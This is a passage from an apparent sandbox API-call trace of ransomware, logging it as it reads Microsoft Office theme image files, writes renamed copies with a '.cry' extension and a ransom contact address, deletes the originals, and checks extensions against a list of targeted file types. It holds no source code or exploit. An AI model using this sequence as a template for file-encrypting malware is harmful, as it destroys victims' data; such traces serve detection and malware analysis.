Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.252] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1737) returned 1 [0048.252] CloseHandle (hObject=0x218) returned 1 [0048.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 0x20 [0048.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.253] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.253] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0048.266] GetLastError () returned 0x0 [0048.266] ReadFile (in: hFile=0x218, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x6c9, lpOverlapped=0x0) returned 1 [0048.267] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0048.268] ReadFile (in: hFile=0x218, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.268] WriteFile (in: hFile=0x1fc, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.268] SetEndOfFile (hFile=0x1fc) returned 1 [0048.268] CloseHandle (hObject=0x1fc) returned 1 [0048.268] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.268] SetEndOfFile (hFile=0x218) returned 1 [0048.269] CloseHandle (hObject=0x218) returned 1 [0048.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.269] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 1 [0048.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.269] lstrlenW (lpString=".doc") returned 4 [0048.270] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.270] lstrlenW (lpString=".docx") returned 5 [0048.270] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.270] lstrlenW (lpString=".pdf") returned 4 [0048.270] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.270] lstrlenW (lpString=".xls") returned 4 [0048.270] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.270] lstrlenW (lpString=".xlsx") returned 5 [0048.270] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.270] lstrlenW (lpString=".ppt") returned 4 [0048.270] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.270] lstrlenW (lpString=".zip") returned 4 [0048.270] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.270] lstrlenW (lpString=".rar") returned 4 [0048.270] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.270] lstrlenW (lpString=".bz2") returned 4 [0048.270] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.270] lstrlenW (lpString=".7z") returned 3 [0048.270] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.270] lstrlenW (lpString=".dbf") returned 4 [0048.270] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.270] lstrlenW (lpString=".1cd") returned 4 [0048.270] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.270] lstrlenW (lpString=".jpg") returned 4 [0048.270] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.270] lstrlenW (lpString=".doc") returned 4 [0048.270] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.270] lstrlenW (lpString=".docx") returned 5 [0048.270] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.270] lstrlenW (lpString=".pdf") returned 4 [0048.271] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.271] lstrlenW (lpString=".xls") returned 4 [0048.271] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.271] lstrlenW (lpString=".xlsx") returned 5 [0048.271] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.271] lstrlenW (lpString=".ppt") returned 4 [0048.271] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.271] lstrlenW (lpString=".zip") returned 4 [0048.271] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.271] lstrlenW (lpString=".rar") returned 4 [0048.271] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.271] lstrlenW (lpString=".bz2") returned 4 [0048.271] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.271] lstrlenW (lpString=".7z") returned 3 [0048.271] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.271] lstrlenW (lpString=".dbf") returned 4 [0048.271] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.271] lstrlenW (lpString=".1cd") returned 4 [0048.271] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0048.271] lstrlenW (lpString=".jpg") returned 4 [0048.271] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.272] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0048.272] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.275] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1675) returned 1 [0048.275] CloseHandle (hObject=0x218) returned 1 [0048.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 0x20 [0048.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0048.275] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.275] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0048.470] GetLastError () returned 0x0 [0048.470] ReadFile (in: hFile=0x218, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x68b, lpOverlapped=0x0) returned 1 [0048.648] WriteFile (in: hFile=0x164, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x690, lpOverlapped=0x0) returned 1 [0048.649] ReadFile (in: hFile=0x218, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.649] WriteFile (in: hFile=0x164, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.649] SetEndOfFile (hFile=0x164) returned 1 [0048.649] CloseHandle (hObject=0x164) returned 1 [0048.649] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.649] SetEndOfFile (hFile=0x218) returned 1 [0048.650] CloseHandle (hObject=0x218) returned 1 [0048.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.650] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString=".doc") returned 4 [0048.651] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.651] lstrlenW (lpString=".docx") returned 5 [0048.651] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.651] lstrlenW (lpString=".pdf") returned 4 [0048.651] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.651] lstrlenW (lpString=".xls") returned 4 [0048.651] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.651] lstrlenW (lpString=".xlsx") returned 5 [0048.651] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.651] lstrlenW (lpString=".ppt") returned 4 [0048.651] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString=".zip") returned 4 [0048.651] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.651] lstrlenW (lpString=".rar") returned 4 [0048.651] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.651] lstrlenW (lpString=".bz2") returned 4 [0048.651] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.651] lstrlenW (lpString=".7z") returned 3 [0048.651] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString=".dbf") returned 4 [0048.651] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString=".1cd") returned 4 [0048.651] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString=".jpg") returned 4 [0048.651] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.651] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.652] lstrlenW (lpString=".doc") returned 4 [0048.652] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.652] lstrlenW (lpString=".docx") returned 5 [0048.652] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.652] lstrlenW (lpString=".pdf") returned 4 [0048.652] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.652] lstrlenW (lpString=".xls") returned 4 [0048.652] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.652] lstrlenW (lpString=".xlsx") returned 5 [0048.652] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.652] lstrlenW (lpString=".ppt") returned 4 [0048.652] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.652] lstrlenW (lpString=".zip") returned 4 [0048.652] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.652] lstrlenW (lpString=".rar") returned 4 [0048.652] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.652] lstrlenW (lpString=".bz2") returned 4 [0048.652] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.652] lstrlenW (lpString=".7z") returned 3 [0048.652] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.652] lstrlenW (lpString=".dbf") returned 4 [0048.652] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.652] lstrlenW (lpString=".1cd") returned 4 [0048.652] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.652] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0048.652] lstrlenW (lpString=".jpg") returned 4 [0048.652] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.776] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=44302) returned 1 [0048.776] CloseHandle (hObject=0x1c0) returned 1 [0048.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 0x20 [0048.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0048.776] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.777] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0048.777] GetLastError () returned 0x0 [0048.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xad0e, lpOverlapped=0x0) returned 1 [0048.779] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xad10, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xad10, lpOverlapped=0x0) returned 1 [0048.783] ReadFile (in: hFile=0x1c0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.783] WriteFile (in: hFile=0x16c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.783] SetEndOfFile (hFile=0x16c) returned 1 [0048.783] CloseHandle (hObject=0x16c) returned 1 [0048.783] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.783] SetEndOfFile (hFile=0x1c0) returned 1 [0048.784] CloseHandle (hObject=0x1c0) returned 1 [0048.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.784] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png")) returned 1 [0048.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0048.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0048.785] lstrlenW (lpString=".doc") returned 4 [0048.785] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.785] lstrlenW (lpString=".docx") returned 5 [0048.785] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.785] lstrlenW (lpString=".pdf") returned 4 [0048.785] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.785] lstrlenW (lpString=".xls") returned 4 [0048.785] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.785] lstrlenW (lpString=".xlsx") returned 5 [0048.785] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.785] lstrlenW (lpString=".ppt") returned 4 [0048.785] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0048.785] lstrlenW (lpString=".zip") returned 4 [0048.785] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.785] lstrlenW (lpString=".rar") returned 4 [0048.785] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.785] lstrlenW (lpString=".bz2") returned 4 [0048.785] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.785] lstrlenW (lpString=".7z") returned 3 [0048.785] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0048.787] lstrlenW (lpString=".dbf") returned 4 [0048.787] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0048.787] lstrlenW (lpString=".1cd") returned 4 [0048.787] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.787] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 77 [0048.787] lstrlenW (lpString=".jpg") returned 4 [0048.787] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.788] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.788] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.853] GetLastError () returned 0x0 [0048.853] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x623, lpOverlapped=0x0) returned 1 [0048.858] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x630, lpOverlapped=0x0) returned 1 [0048.859] ReadFile (in: hFile=0x190, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.859] WriteFile (in: hFile=0x194, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.859] SetEndOfFile (hFile=0x194) returned 1 [0048.859] CloseHandle (hObject=0x194) returned 1 [0048.859] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.859] SetEndOfFile (hFile=0x190) returned 1 [0048.860] CloseHandle (hObject=0x190) returned 1 [0048.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.860] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 1 [0048.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0048.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 